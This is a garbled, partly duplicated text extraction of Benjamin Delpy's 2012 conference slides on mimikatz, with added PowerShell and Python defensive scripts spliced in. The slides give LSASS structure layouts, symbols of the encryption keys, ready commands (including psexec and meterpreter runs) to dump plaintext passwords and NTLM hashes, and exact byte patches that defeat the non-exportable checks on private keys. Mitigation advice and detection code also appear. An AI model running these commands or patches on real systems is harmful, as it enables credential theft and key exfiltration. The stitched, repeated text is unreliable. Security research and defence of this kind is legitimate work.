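# the talk covers can be found and moved to a smartcard, token, HSM or TPM-backed provider.
# Touching a smartcard-held key may prompt for its PIN.

# Software providers named in the talk: for these, the "non-exportable" flag is enforced only
# by provider code (rsaenh.dll in-process, or the KSP inside LSASS), not by the key storage.
$softwareProviders = @(
    'Microsoft Base Cryptographic Provider v1.0',
    'Microsoft Enhanced Cryptographic Provider v1.0',
    'Microsoft Enhanced RSA and AES Cryptographic Provider',
    'Microsoft RSA SChannel Cryptographic Provider',
    'Microsoft Strong Cryptographic Provider',
    'Microsoft Software Key Storage Provider'
)

function Get-PrivateKeyStorage {
    param([System.Security.Cryptography.X509Certificates.X509Certificate2]$Cert)
    $info = [ordered]@{ Api = 'unknown'; Provider = $null; Exportable = $null }
    # CAPI (CSP) keys: the legacy PrivateKey property yields an RSACryptoServiceProvider.
    # For CNG keys this property is null or throws, so that failure is expected and ignored.
    try {
        $csp = $Cert.PrivateKey
        if ($csp -is [System.Security.Cryptography.RSACryptoServiceProvider]) {
            $ci = $csp.CspKeyContainerInfo
            $info.Api        = 'CAPI'
            $info.Provider   = $ci.ProviderName
            $info.Exportable = $ci.Exportable
            return [pscustomobject]$info
        }
    } catch { }
    # CNG (KSP) keys: GetRSAPrivateKey returns an RSACng wrapping the CngKey.
    try {
        $rsa = [System.Security.Cryptography.X509Certificates.RSACertificateExtensions]::GetRSAPrivateKey($Cert)
        if ($rsa -is [System.Security.Cryptography.RSACng]) {
            $key = $rsa.Key
            $allow = [System.Security.Cryptography.CngExportPolicies]::AllowExport
            $info.Api        = 'CNG'
            $info.Provider   = $key.Provider.Provider
            $info.Exportable = (($key.ExportPolicy -band $allow) -ne 0)
        }
    } catch { }
    [pscustomobject]$info
}

$report = foreach ($store in 'Cert:\CurrentUser\My', 'Cert:\LocalMachine\My') {
    $certs = Get-ChildItem -Path $store -ErrorAction SilentlyContinue |
        Where-Object { $_.HasPrivateKey }
    foreach ($cert in $certs) {
        $s = Get-PrivateKeyStorage -Cert $cert
        [pscustomobject]@{
            Store       = $store
            Subject     = $cert.Subject
            Thumbprint  = $cert.Thumbprint
            Api         = $s.Api
            Provider    = $s.Provider
            Exportable  = $s.Exportable
            # true: the key lives in a software provider and relies on that provider's own check
            SoftwareKey = ($softwareProviders -contains $s.Provider)
        }
    }
}
$report | Sort-Object SoftwareKey -Descending | Format-Table -AutoSize
```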
mimikatz: what else can it do?
Play with minesweeper
Manipulate some handles
Pass the hash
Dump SAM / AD
Stop event monitoring
Patch Terminal Server
Basic GPO bypass
Applocker / SRP bypass
Driver:
– Play with tokens & privileges
– Display SSDT x86 & x64
– List minifilter actions
– List notifications (process, thread, image, registry)
– List object hooks and procedures
– ...
...
mimikatz: that's all folks
Thanks to / Merci à:
– my girlfriend for her support (her LSASS crashed a few times)
– Application Security Forum for offering me this great opportunity
• Partners and Sponsors, for sure
– Microsoft for always considering it as normal/acceptable
– Security friends/community for their ideas & challenges
• nagual, newsoft, mubix, ...
– You, for your attention
Questions?
Don't be shy ;)
...especially if you have written down the corresponding slide number
Blog, Source Code & Contact
blog: http://blog.gentilkiwi.com/mimikatz
source: https://code.google.com/p/mimikatz/
email: benjamin@gentilkiwi.com
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 57
mimikatz sekurlsa livessp
because Microsoft was too good in closed networks
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 22
mimikatz sekurlsa livessphow
Actually Irsquove only used logical (empirical) approach to search passwordshellip ndash Protocol reading
ndash Symbols searching
~ Boring ~hellip be more brutal this time make a WinDBG trap
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 23
0 kdgt process 0 0 lsassexePROCESS 83569040 SessionId 0 Cid 0224 Peb 7f43f000 ParentCid 01b4
DirBase 5df58100 ObjectTable 80ce4740 HandleCount ltData Not AccessiblegtImage lsassexe
0 kdgt process i 83569040You need to continue execution (press g ltentergt) for the contextto be switched When the debugger breaks in again you will be inthe new process context0 kdgt gBreak instruction exception - code 80000003 (first chance)ntRtlpBreakWithStatusInstruction814b39d0 cc int 30 kdgt reload userLoading User Symbols0 kdgt bp p $proc lsasrvLsaProtectMemory kc 5 g0 kdgt g
mimikatz sekurlsa livessphow
Letrsquos login with a Live account on Windows 8
After credentials protection LsaApLogonUserEx2 calls LiveCreateLogonSession to insert data in LiveGlobalLogonSessionList (similar to WDigest)
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 24
lsasrvLsaProtectMemorylivesspLiveMakeSupplementalCredlivesspLiveMakeSecPkgCredentialslivesspLsaApLogonUserEx2livesspSpiLogonUserEx2
lsasrvLsaProtectMemorymsv1_0NlpAddPrimaryCredentialmsv1_0SspAcceptCredentialsmsv1_0SpAcceptCredentials
lsasrvLsaProtectMemorytspkgTSHidePasswordtspkgSpAcceptCredentials
1 kdgt uf c livesspLsaApLogonUserEx2livesspLsaApLogonUserEx2 (74781536)[]livesspLsaApLogonUserEx2+0x560 (74781a96)call to livesspLiveCreateLogonSession (74784867)
Our LiveSSP provider
Yeah Pass the Hash capability with Live account toohellip
Live user can logon through RDP via SSO
mimikatz sekurlsa livesspworkflow
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 25
LsaUnprotectMemory
LsaEnumerateLogonSessions
for each LUID
password in clear
typedef struct _KIWI_LIVESSP_LIST_ENTRY struct _KIWI_LIVESSP_LIST_ENTRY Flinkstruct _KIWI_LIVESSP_LIST_ENTRY BlinkPVOID unk0PVOID unk1PVOID unk2PVOID unk3DWORD unk4DWORD unk5PVOID unk6LUID LocallyUniqueIdentifierLSA_UNICODE_STRING UserNamePVOID unk7PKIWI_LIVESSP_PRIMARY_CREDENTIAL suppCreds
KIWI_LIVESSP_LIST_ENTRY PKIWI_LIVESSP_LIST_ENTRY
livesspLiveGlobalLogonSessionList
search linked list for LUID
KIWI_LIVESSP_LIST_ENTRYKIWI_LIVESSP_PRIMARY_CREDENTIAL
typedef struct _KIWI_LIVESSP_PRIMARY_CREDENTIAL DWORD isSuppDWORD unk0LSA_UNICODE_STRING UserNameLSA_UNICODE_STRING DomaineLSA_UNICODE_STRING Password
KIWI_LIVESSP_PRIMARY_CREDENTIAL PKIWI_LIVESSP_PRIMARY_CREDENTIAL
mimikatz sekurlsa
Even if we already have tools for normal accounts are you not curious to test one with this trap
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 26
Me yes
mimikatz sekurlsa kerberos
Letrsquos login normal account
After credentials protection KerbCreateLogonSession calls ndash NT6 KerbInsertOrLocateLogonSession to insert data in
KerbGlobalLogonSessionTable
ndash NT5 KerbInsertLogonSession to insert data in KerbLogonSessionList
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 27
lsasrvLsaProtectMemorykerberosKerbHideKeykerberosKerbCreatePrimaryCredentialskerberosKerbCreateLogonSessionkerberosSpAcceptCredentials
lsasrvLsaProtectMemorykerberosKerbHidePasswordkerberosKerbCreateLogonSessionkerberosSpAcceptCredentials
lsasrvLsaProtectMemorymsv1_0NlpAddPrimaryCredentialmsv1_0SspAcceptCredentialsmsv1_0SpAcceptCredentials
lsasrvLsaProtectMemorywdigestSpAcceptCredentials
lsasrvLsaProtectMemorytspkgTSHidePasswordtspkgSpAcceptCredentials
Kerberos part for password
Kerberos ticket part Maybe )
mimikatz sekurlsa kerberos (nt6)workflow
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 28
RtlLookupElementGenericTableAvl
LsaUnprotectMemory
KIWI_KERBEROS_PRIMARY_CREDENTIAL
typedef struct _KIWI_KERBEROS_PRIMARY_CREDENTIAL
DWORD unk0PVOID unk1PVOID unk2PVOID unk3
ifdef _M_X64BYTE unk4[32]
elif defined _M_IX86BYTE unk4[20]
endifLUID LocallyUniqueIdentifier
ifdef _M_X64BYTE unk5[44]
elif defined _M_IX86BYTE unk5[36]
endifLSA_UNICODE_STRING UserNameLSA_UNICODE_STRING DomaineLSA_UNICODE_STRING Password
KIWI_KERBEROS_PRIMARY_CREDENTIAL PKIWI_KERBEROS_PRIMARY_CREDENTIAL
LsaEnumerateLogonSessions
for each LUID
password in clear
KIWI_KERBEROS_PRIMARY_CREDENTIAL
KerberosKerbGlobalLogonSessionTable
mimikatz sekurlsa kerberos (nt5)workflow
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 29
LsaUnprotectMemory
LsaEnumerateLogonSessions
for each LUID
password in clear
typedef struct _KIWI_KERBEROS_LOGON_SESSION struct _KIWI_KERBEROS_LOGON_SESSION Flinkstruct _KIWI_KERBEROS_LOGON_SESSION Blink DWORD UsageCountPVOID unk0PVOID unk1PVOID unk2DWORD unk3DWORD unk4PVOID unk5PVOID unk6PVOID unk7LUID LocallyUniqueIdentifier
ifdef _M_IX86DWORD unk8
endifDWORD unk9DWORD unk10PVOID unk11DWORD unk12DWORD unk13PVOID unk14PVOID unk15PVOID unk16[hellip]LSA_UNICODE_STRING UserNameLSA_UNICODE_STRING DomaineLSA_UNICODE_STRING Password
KIWI_KERBEROS_LOGON_SESSION PKIWI_KERBEROS_LOGON_SESSION
kerberosKerbLogonSessionList
search linked list for LUID
KIWI_LIVESSP_PRIMARY_CREDENTIAL
mimikatz sekurlsademo time
Final sekurlsa demo sekurlsalogonPasswords full
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 30
mimikatz sekurlsa kerberosldquohu rdquo
Ok It workshellip
But why
Not at all logon on NT5 (can need an unlock)
From my understanding of Microsoft explanations
ndash no need of passwords for the Kerberos protocolhellip
ndash all is based on the hash (not very sexy too)
Microsoftrsquos implementation of Kerberos is full of logicalhellip
ndash For password auth
bull password hash for shared secret but keeping password in memory
ndash For full smartcard auth
bull No password on client
bull No hash on client
ndash NTLM hash on clienthellip
ndash KDC sent it back as a gift
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 31
mimikatz sekurlsa
All passwords in memory are encrypted but in a reversible way to be used
We used LsaUnprotecMemory in the LSASS context to decrypt them
ndash This function rely on LsaEncryptMemory from lsasrvdll
For that we previously inject a DLL (sekurlsadll) in the LSASS process to take benefits of its keys when we called it
Can it be fun to decrypt outside the process ndash Yes it ishellip no more injection just reading memory of LSASS processhellip
mimikatz can use lsasrvdll too and ldquoimportsrdquo LSASS initialized keys ndash When we call LsaEncryptMemory in mimikatz with all keys imported from LSASS we have
the same comportments than when we are in LSASS
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 32
LsaUnprotectMemory
mimikatz sekurlsa: LsaEncryptMemory (NT5)

Depending on the size of the secret, LsaEncryptMemory uses:
– RC4
– DESX

[Diagram: key material in the lsass process (lsasrv): g_cbRandomKey (DWORD, 256), g_pRandomKey (BYTE[g_cbRandomKey]), g_pDESXKey (BYTE[144]), g_Feedback (BYTE[8]); mimikatz copies these values out of LSASS into its own instance of lsasrv…]
mimikatz sekurlsa: LsaEncryptMemory (NT6)

Depending on the size of the secret, LsaEncryptMemory uses:
– 3DES
– AES

[Diagram: key material in the lsass process (lsasrv): InitializationVector (BYTE[16]), h3DesKey and hAesKey (BCrypt key handles, layout below); mimikatz copies them out of LSASS into its own instance of lsasrv…]

	typedef struct _KIWI_BCRYPT_KEY {
		DWORD size;
		DWORD type;
		PVOID unk0;
		PKIWI_BCRYPT_KEY_DATA cle;
		PVOID unk1;
	} KIWI_BCRYPT_KEY, *PKIWI_BCRYPT_KEY;

	typedef struct _KIWI_BCRYPT_KEY_DATA {
		DWORD size;
		DWORD tag;
		DWORD type;
		DWORD unk0;
		DWORD unk1;
		DWORD unk2;
		DWORD unk3;
		PVOID unk4;
		BYTE data; /* etc. */
	} KIWI_BCRYPT_KEY_DATA, *PKIWI_BCRYPT_KEY_DATA;
mimikatz sekurlsa: memo

Security Packages

Package          Symbols                                                   Type
tspkg            tspkg!TSGlobalCredTable                                   RTL_AVL_TABLE
wdigest          wdigest!l_LogSessList                                     LIST_ENTRY
livessp          livessp!LiveGlobalLogonSessionList                        LIST_ENTRY
kerberos (nt5)   kerberos!KerbLogonSessionList                             LIST_ENTRY
kerberos (nt6)   kerberos!KerbGlobalLogonSessionTable                      RTL_AVL_TABLE
msv1_0           lsasrv!LogonSessionList / lsasrv!LogonSessionListCount    LIST_ENTRY / ULONG

Protection Keys

Key     NT 5 Symbols
RC4     lsasrv!g_cbRandomKey, lsasrv!g_pRandomKey
DESX    lsasrv!g_pDESXKey, lsasrv!g_Feedback

Key     NT 6 Symbols
        lsasrv!InitializationVector
3DES    lsasrv!h3DesKey
AES     lsasrv!hAesKey
mimikatz sekurlsa: memo

Some commands:
	mimikatz privilege::debug sekurlsa::logonPasswords full exit
	psexec \\windows -s -c c:\mimikatz\Win32\mimikatz.exe sekurlsa::logonPasswords full exit
	meterpreter > execute -H -c -i -m -f /pentest/passwords/mimikatz/mimikatz_x86.exe

	mimikatz 1.0 x64 (RC)	/* Traitement du Kiwi (Aug  2 2012 01:32:28) */
	// http://blog.gentilkiwi.com/mimikatz

	mimikatz # privilege::debug
	Demande d'ACTIVATION du privilège : SeDebugPrivilege : OK

	mimikatz # sekurlsa::logonPasswords full

	Authentification Id        : 0;234870
	Package d'authentification : NTLM
	Utilisateur principal      : Gentil Kiwi
	Domaine d'authentification : vm-w8-rp-x
		msv1_0 :
		 * Utilisateur  : Gentil Kiwi
		 * Domaine      : vm-w8-rp-x
		 * Hash LM      : d0e9aee149655a6075e4540af1f22d3b
		 * Hash NTLM    : cc36cf7a8514893efccd332446158b1a
		kerberos :
		 * Utilisateur  : Gentil Kiwi
		 * Domaine      : vm-w8-rp-x
		 * Mot de passe : waza1234
		wdigest :
		 * Utilisateur  : Gentil Kiwi
		 * Domaine      : vm-w8-rp-x
		 * Mot de passe : waza1234
		tspkg :
		 * Utilisateur  : Gentil Kiwi
		 * Domaine      : vm-w8-rp-x
		 * Mot de passe : waza1234
		livessp :
		n.t. (LUID KO)
mimikatz sekurlsa: what we can do

Basics
– No physical access to the computer (first step to pass the hash, then pass the pass)
– No admin rights / system rights / debug privileges (…)
– Disable local admin accounts
– Strong passwords (haha, it was a joke, so useless ;))
– For privileged accounts, network logon instead of interactive (when possible)
– Audit: pass the hash keeps traces and can lock accounts
– No admin rights / system rights / debug privileges, even for VIPs
– Use a separate network (or forest) for privileged tasks

More in depth
– Force strong authentication (SmartCard & Token) $ €
– Short validity for Kerberos tickets
– No delegation
– Disable NTLM (available with NT6)
– No exotic
  • biometrics (it keeps the password somewhere and pushes it to Windows)
  • single sign-on
– Stop shared secrets for authentication; push public/private stuff (like keys ;))
– Leave opportunities to stop retro-compatibility
– Disable faulty providers
  • Is it supported by Microsoft?
  • Even if you can disable LiveSSP, TsPkg and WDigest, will you disable Kerberos and msv1_0?
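The "Audit" bullet above, together with the distinction the previous slides draw between injecting a DLL into LSASS and merely reading its memory, can be turned into a triage rule on process-access telemetry. The following is an added example (Python, not from the slides or from mimikatz) that buckets handles opened on lsass.exe by the access rights they request; the record format and all sample records are constructed, loosely mimicking the SourceImage / TargetImage / GrantedAccess fields of a Sysmon ProcessAccess (Event ID 10) event.

```python
"""Triage process-access events against lsass.exe by the access rights requested.

Added example, not part of the original slides or of mimikatz. The deck explains
that sekurlsa moved from injecting sekurlsa.dll into LSASS to simply reading LSASS
memory, and that auditing keeps traces: this shows what such an audit rule can key
on. The records below are CONSTRUCTED and only mimic the SourceImage / TargetImage /
GrantedAccess fields of a Sysmon ProcessAccess event (Event ID 10); not real logs.
"""
from dataclasses import dataclass
from typing import FrozenSet, List, Optional, Tuple

# Process access rights from winnt.h (the subset that matters here).
PROCESS_TERMINATE = 0x0001
PROCESS_CREATE_THREAD = 0x0002
PROCESS_VM_OPERATION = 0x0008
PROCESS_VM_READ = 0x0010
PROCESS_VM_WRITE = 0x0020
PROCESS_DUP_HANDLE = 0x0040
PROCESS_QUERY_INFORMATION = 0x0400
PROCESS_QUERY_LIMITED_INFORMATION = 0x1000

RIGHT_NAMES = {
    PROCESS_TERMINATE: "PROCESS_TERMINATE",
    PROCESS_CREATE_THREAD: "PROCESS_CREATE_THREAD",
    PROCESS_VM_OPERATION: "PROCESS_VM_OPERATION",
    PROCESS_VM_READ: "PROCESS_VM_READ",
    PROCESS_VM_WRITE: "PROCESS_VM_WRITE",
    PROCESS_DUP_HANDLE: "PROCESS_DUP_HANDLE",
    PROCESS_QUERY_INFORMATION: "PROCESS_QUERY_INFORMATION",
    PROCESS_QUERY_LIMITED_INFORMATION: "PROCESS_QUERY_LIMITED_INFORMATION",
}

# Rights the two behaviours in the deck need on the LSASS handle: injecting a DLL
# (VirtualAllocEx / WriteProcessMemory / CreateRemoteThread) or patching a byte in
# LSASS needs write/operation/thread rights; reading credential material and the
# LsaEncryptMemory keys out of the process only needs PROCESS_VM_READ.
WRITE_OR_INJECT_MASK = PROCESS_CREATE_THREAD | PROCESS_VM_OPERATION | PROCESS_VM_WRITE
READ_MASK = PROCESS_VM_READ


def decode_mask(mask: int) -> List[str]:
    """Name every known right set in an access mask; leftover bits are kept as hex."""
    names = [name for bit, name in RIGHT_NAMES.items() if mask & bit]
    leftover = mask & ~sum(RIGHT_NAMES)  # the keys are distinct bits, so sum == OR
    if leftover:
        names.append(f"other:0x{leftover:x}")
    return names


def classify(mask: int) -> str:
    """Bucket a handle's access mask: write-or-inject > memory-read > query-only."""
    if mask & WRITE_OR_INJECT_MASK:
        return "write-or-inject"
    if mask & READ_MASK:
        return "memory-read"
    return "query-only"


@dataclass(frozen=True)
class ProcessAccessEvent:
    source_image: str
    target_image: str
    granted_access: int


def parse_event(line: str) -> Optional[ProcessAccessEvent]:
    """Parse one constructed 'EventID|SourceImage|TargetImage|GrantedAccess' record."""
    parts = line.strip().split("|")
    if len(parts) != 4 or parts[0] != "10":
        return None
    try:
        granted = int(parts[3], 16)
    except ValueError:
        return None
    return ProcessAccessEvent(parts[1], parts[2], granted)


def triage(lines: List[str],
           allowlist: FrozenSet[str] = frozenset()) -> List[Tuple[str, str, str]]:
    """Return (source_image, verdict, severity) for each non-trivial handle to lsass.exe.

    Query-only handles (e.g. Task Manager) are dropped. Sources on the allowlist
    (AV/EDR/backup agents, tuned per environment) are kept but downgraded to 'info':
    the image name alone proves nothing, since any tool can be renamed.
    """
    findings = []
    for line in lines:
        ev = parse_event(line)
        if ev is None or not ev.target_image.lower().endswith("\\lsass.exe"):
            continue
        verdict = classify(ev.granted_access)
        if verdict == "query-only":
            continue
        severity = "high" if verdict == "write-or-inject" else "medium"
        if ev.source_image.lower() in allowlist:
            severity = "info"
        findings.append((ev.source_image, verdict, severity))
    return findings


# Constructed sample records (not real telemetry).
SAMPLE_EVENTS = [
    r"10|C:\Windows\System32\taskmgr.exe|C:\Windows\System32\lsass.exe|0x1400",
    r"10|C:\Tools\dumper.exe|C:\Windows\System32\lsass.exe|0x1010",
    r"10|C:\Tools\patcher.exe|C:\Windows\System32\lsass.exe|0x1fffff",
    r"10|C:\Program Files\EDR\sensor.exe|C:\Windows\System32\lsass.exe|0x1010",
    r"10|C:\Tools\dumper.exe|C:\Windows\System32\notepad.exe|0x1010",
    "garbage line",
]
ALLOWLIST = frozenset({r"c:\program files\edr\sensor.exe"})

if __name__ == "__main__":
    for source, verdict, severity in triage(SAMPLE_EVENTS, ALLOWLIST):
        print(f"{severity:6} {verdict:15} {source}")
```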
mimikatz crypto: what is it

A little module that I wrote to
– play with the Windows Cryptographic API, CNG and RSA keys
– automate the export of certificates/keys
  • Even those which are "not" exportable

What the crypto module can do:
– List
  • Providers
  • Stores
  • Certificates
  • Keys
– Export
  • Certificates
    – public, in DER format
    – with private keys, in PFX format
  • Private keys in PVK format – it's cool, OpenSSL can deal with it too
– Patch
  • CryptoAPI in mimikatz context
  • CNG in LSASS context (again ;))

mod_mimikatz_crypto
mimikatz crypto: how it's protected

Private keys are DPAPI protected
– You cannot reuse private key files on another computer
  • At least not without the master keys and/or the users' passwords
Computer/User can load their own keys because they have enough secrets to do it (e.g. an opened session)
– Yes, a computer/server opens a "session"

Export/Usage can be limited by:
– Password (constraint for most users; unavailable for computer keys)
– Popup (constraint for most users; unavailable for computer keys)
– Export/Archive flag not present

	certutil -importpfx mycert.p12 NoExport
	certutil -csp "Microsoft Enhanced Cryptographic Provider v1.0" -importpfx mycert.p12 NoExport
mimikatz crypto capi: how it works

"Microsoft CryptoAPI provides a secure interface for the cryptographic functionality that is supplied by the installable cryptographic service provider (CSP) modules. CSPs perform all cryptographic operations and manage private keys. CSPs can be implemented in software as well as in hardware."
– http://technet.microsoft.com/library/cc962093.aspx

Processes (mimikatz, IIS, Active Directory, Internet Explorer, your apps here…) load some DLLs to deal with different cryptographic stuff: CSP (keys), smartcard reader, …
– cryptdll.dll, rsaenh.dll, …
Processes deal with cryptographic keys through this API…
mimikatz crypto capi: how it's exported ( level)

[Diagram: the process asks the CryptoAPI / RSA CSP to export a key; the CSP loads the private key (DPAPI decode) and checks the Exportable flag: yes → exported key; no → NTE_BAD_KEY_STATE. Labels: Process, CryptoAPI and RSA CSP, Ask to export Key, Load Private Key, DPAPI Decode, Exportable?, Exported Key, NTE_BAD_KEY_STATE, PLAYSKOOL]
mimikatz crypto patch capi: because I own my process

When we want to export a certificate with its private key (or only the key), it goes through rsaenh!CPExportKey.
This function does all the work to prepare the export, and checks whether the key is exportable.

	mimikatz # crypto::exportCertificates
	Emplacement : 'CERT_SYSTEM_STORE_CURRENT_USER'\My
	 - Benjamin Delpy
		Container Clé  : 470ADFBA-8718-4014-B05E-B30776B75A03
		Provider       : Microsoft Enhanced Cryptographic Provider v1.0
		Type           : AT_KEYEXCHANGE
		Exportabilité  : NON
		Taille clé     : 2048
		Export privé dans 'CERT_SYSTEM_STORE_CURRENT_USER_My_0_Benjamin Delpy.pfx' : KO (0x8009000b) Clé non valide pour l'utilisation dans l'état spécifié.
		Export public dans 'CERT_SYSTEM_STORE_CURRENT_USER_My_0_Benjamin Delpy.der' : OK

	================ Certificat 0 ================
	Numéro de série : 112169417a1c3ef46a301f99385f50680fa0
	Émetteur : CN=GlobalSign CodeSigning CA - G2, O=GlobalSign nv-sa, C=BE
	Objet : CN=Benjamin Delpy, C=FR
	Il ne s'agit pas d'un certificat racine
	Hach. cert. (sha1) : ab 9e 92 b9 43 ed 47 d9 15 bc 26 93 9e 24 a5 83 03 ac aa 7e
	  Conteneur de clé = 470ADFBA-8718-4014-B05E-B30776B75A03
	  Fournisseur = Microsoft Enhanced Cryptographic Provider v1.0
	La clé privée NE PEUT PAS être exportée
	Succès du test de cryptage
	CertUtil: -exportPFX ÉCHEC de la commande : 0x8009000b (-2146893813)
	CertUtil: Clé non valide pour l'utilisation dans l'état spécifié.

(Exportable? check)
mimikatz crypto patch capi: because I own my process

So what? A module in my own process returns that I can't do something? CryptoAPI is in my memory space, let's patch it.
I wrote "4" bytes in my memory space:

	.text:0AC0B7CB  0F 85 33 C7 FF FF    jnz     continue_key_export_or_archive           ; original
	.text:0AC0B7CB  90                   nop                                              ; patched
	.text:0AC0B7CC  E9 33 C7 FF FF       jmp     continue_key_export_or_archive

	.text:0AC1F749  0F 85 B6 3B FF FF    jnz     continue_key_export_or_archive_prepare   ; original
	.text:0AC1F749  90                   nop                                              ; patched
	.text:0AC1F74A  E9 B6 3B FF FF       jmp     continue_key_export_or_archive_prepare
mimikatz crypto patch capi: demo time

Import, export, import as not exportable… export
mimikatz crypto patch capi: limitations

Because
– I'm lazy
– In the majority of cases I've seen RSA keys in real-life use
  • Elliptic Curve a little…

mimikatz crypto::patchcapi only deals with:
– Microsoft Base Cryptographic Provider v1.0
– Microsoft Enhanced Cryptographic Provider v1.0
– Microsoft Enhanced RSA and AES Cryptographic Provider
– Microsoft RSA SChannel Cryptographic Provider
– Microsoft Strong Cryptographic Provider
…all based on rsaenh.dll
mimikatz crypto cng: how it works

"Cryptography API: Next Generation (CNG) is the long-term replacement for the CryptoAPI. CNG is designed to be extensible at many levels and cryptography agnostic in behavior."
– http://msdn.microsoft.com/library/windows/desktop/aa376210.aspx

"To comply with common criteria (CC) requirements, the long-lived keys must be isolated so that they are never present in the application process. CNG currently supports the storage of asymmetric private keys by using the Microsoft software KSP that is included with Windows Server 2008 and Windows Vista and installed by default."

This time, key operations are not made in the "user" process context
Processes use RPC to call the "Key Isolation service" (keyiso) functions
It seems more secure than CryptoAPI…
– It is, but it's not perfect…
mimikatz crypto cng: how it's exported ( level)

[Diagram: the process calls CNG, which forwards the export request over RPC to the KeyIso service in the LSASS process; there the private key is loaded (DPAPI decode) and the Exportable flag is checked: yes → exported key; no → NTE_NOT_SUPPORTED. On NT6, LSASS is a System protected process: ML_SYSTEM, SYSTEM_MANDATORY_LABEL_NO_WRITE_UP / SYSTEM_MANDATORY_LABEL_NO_READ_UP. Labels: Process, CNG, Ask to export Key, RPC, KeyIso Service (LSASS Process), Load Private Key, DPAPI Decode, Exportable?, Exported Key, NTE_NOT_SUPPORTED, PLAYSKOOL]
mimikatz crypto patch cng: because sometimes I own LSASS

When we want to export a certificate with its private key (or only the key), the RPC calls lead to lsass (keyiso) ncrypt!SPCryptExportKey.
This function does all the work to prepare the export, and checks whether the key is exportable.

	mimikatz # crypto::exportKeys
	[user] Clés CNG
	 - cng_user_noexport-a3419340-5e5b-4b9a-bf08-d35d75a9b318
		Exportabilité  : NON
		Taille clé     : 2048
		Export privé dans 'cng_user_0_cng_user_noexport-a3419340-5e5b-4b9a-bf08-d35d75a9b318.pvk' : KO
		mod_cryptong::getPrivateKey / PrivateKeyBlobToPVK : (0x80090029) L'opération demandée n'est pas prise en charge.

(Exportable? check)
mimikatz crypto patch cng: because sometimes I own LSASS

This time the checks and the keys are in the LSASS process… And what?
I wrote "1" byte in LSASS memory space…

	.text:6C815210  75 1C    jnz     short continue_key_export    ; original
	.text:6C815210  EB 1C    jmp     short continue_key_export    ; patched
mimikatz crypto patch cng: demo time

Import, export, import as not exportable… export again
mimikatz crypto patch cng: limitations

The patch operation needs some privileges
– Admin (debug privilege)
– SYSTEM

mimikatz crypto::patchcng only deals with:
– Microsoft Software Key Storage Provider (maybe other algorithms than RSA)

Not a limitation of mimikatz, but the MMC add-in for certificates cannot export CNG certificates… even those that are exportable (hu?)
– certutil can…
mimikatz crypto patch cng: bonus

After one admin has patched LSASS, all users of the current system benefit from the extra exports
– until reboot / KeyIso service restart
Some other programs that don't check the export flag before asking for an export can work too
– Yeah, like the good old certutil

	C:\Users\Gentil Kiwi\Desktop>certutil -user -p export_waza -privatekey -exportpfx cng_user_noexport test.pfx
	MY
	================ Certificat 1 ================
	[…]
	Hach. cert. (sha1) : dc 00 c9 c7 9f 47 96 f2 8a ff 2d 0e e3 f2 97 e3 6f c2 ce 8b
	  Conteneur de clé = cng_user_noexport-a3419340-5e5b-4b9a-bf08-d35d75a9b318
	  Fournisseur = Microsoft Software Key Storage Provider
	La clé privée NE PEUT PAS être exportée
	Succès du test de chiffrement
	CertUtil: -exportPFX ÉCHEC de la commande : 0x8009000b (-2146893813)
	CertUtil: Clé non valide pour l'utilisation dans l'état spécifié.

	C:\Users\Gentil Kiwi\Desktop>certutil -user -p export_waza -privatekey -exportpfx cng_user_noexport test.pfx
	MY
	================ Certificat 1 ================
	[…]
	Hach. cert. (sha1) : dc 00 c9 c7 9f 47 96 f2 8a ff 2d 0e e3 f2 97 e3 6f c2 ce 8b
	  Conteneur de clé = cng_user_noexport-a3419340-5e5b-4b9a-bf08-d35d75a9b318
	  Fournisseur = Microsoft Software Key Storage Provider
	Succès du test de chiffrement
	CertUtil: -exportPFX La commande s'est terminée correctement.
mimikatz crypto: memo

Some commands:
	mimikatz crypto::patchcapi crypto::exportCertificates exit
	psexec \\windows -s -c c:\mimikatz\Win32\mimikatz.exe crypto::patchcapi crypto::patchcng crypto::exportCertificates CERT_SYSTEM_STORE_LOCAL_MACHINE crypto::exportKeys computer exit
	mimikatz crypto::exportCertificates CERT_SYSTEM_STORE_LOCAL_MACHINE "Remote Desktop"
	mimikatz privilege::debug crypto::patchcng crypto::patchcapi crypto::exportCertificates crypto::exportKeys exit

Password
– PFX files are protected by this password: mimikatz

Keys
– When you import a certificate multiple times, exportable or not, Windows makes duplicate keys
– When you delete a certificate, Windows does not delete its private key… funny, isn't it?
  • So yes, mimikatz can export it
mimikatz crypto: what we can do

Exactly the same as for sekurlsa: it will prevent access to the accounts / the computer
– no admin, no admin, no admin…

Basics
– Use smartcards/tokens for user certificates
– Use Hardware Security Modules (HSM), even SoftHSM

More in depth
– See what Microsoft can do with the TPM from Windows 8
  • Virtual SmartCard seems promising
– Verify vendors' implementations (Lenovo, Dell, …) of TPM CSP/KSP
  • Their biometrics stuff was a little buggy ;)
mimikatz: what else can it do?

Play with minesweeper
Manipulate some handles
Pass the hash
Dump SAM / AD
Stop event monitoring
Patch Terminal Server
Basic GPO bypass
AppLocker / SRP bypass
Driver
– Play with tokens & privileges
– Display the SSDT, x86 & x64
– List minifilter actions
– List notifications (process, thread, image, registry)
– List object hooks and procedures
– …
…
mimikatz: that's all folks

Thanks to / Merci à
– my girlfriend for her support (her LSASS crashed a few times)
– Application Security Forum for offering me this great opportunity
  • Partners and Sponsors, for sure
– Microsoft for always considering it normal/acceptable
– Security friends/community for their ideas & challenges
  • nagual, newsoft, mubix, …
– You, for your attention

Questions?
Don't be shy ;)
